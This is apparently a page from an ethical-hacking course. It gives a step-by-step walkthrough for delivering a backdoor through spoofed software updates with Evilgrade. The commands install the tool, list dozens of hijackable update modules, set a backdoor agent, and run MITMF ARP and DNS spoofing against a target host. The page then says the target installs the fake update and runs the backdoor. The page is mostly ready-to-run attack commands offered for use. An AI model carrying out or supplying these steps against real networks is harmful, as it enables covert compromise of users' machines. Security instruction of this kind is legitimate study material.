CLIENT SIDE ATTACKS
Backdoor delivery method1 - Spoofing Software Updates
Fake an update for an already installed program.
Install the backdoor instead of the update.
Require DNS spoofing + Evilgrade(a server to serve the update).
1. Download and install Evilgrade.
https://github.com/infobyte/evilgrade
git clone https://github.com/infobyte/evilgrade.git cd evilgrade/ cpan Data::Dump cpan Digest::MD5 cpan Time::HiRes cpan RPC::XML
OR
apt-get install isr-evilgrade
2. Start Evilgrade.
evilgrade
3. Check programs that can be hijacked.
show modules
List of modules: =============== acer allmynotes amsn appleupdate appstore apptapp apt asus atube autoit3 bbappworld blackberry bsplayer ccleaner clamwin cpan cygwin dap divxsuite express_talk fcleaner filezilla flashget flip4mac freerip fsecure_client getjar gom googleanalytics growl inteldriver isopen istat itunes jdtoolkit jet jetphoto keepass lenovo lenovoapk lenovofirmware linkedin miranda mirc nokia nokiasoftware notepadplus openbazaar openoffice opera orbit osx paintnet panda_antirootkit photoscape port quicktime safari samsung skype soapui sparkle sparkle2 speedbit sunbelt sunjava superantispyware teamviewer techtracker timedoctor trillian ubertwitter vidbox virtualbox vmware winamp winscp winupdate winzip yahoomsn - 80 modules available.
4. Select one
configure [module]
5. Set backdoor location.
set agent [agent location]
6. Start server
start
7. Start DNS spoofing and handler.
Modify the mitmf.conf file.
Start MITMF:
pyton2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.21 -i eth0 --dns
Msf:
Install the update on target machine. Then you can run the backdoor program>>
Ethical Hacking - GAINING ACCESS(12)
原文:https://www.cnblogs.com/keepmoving1113/p/12147545.html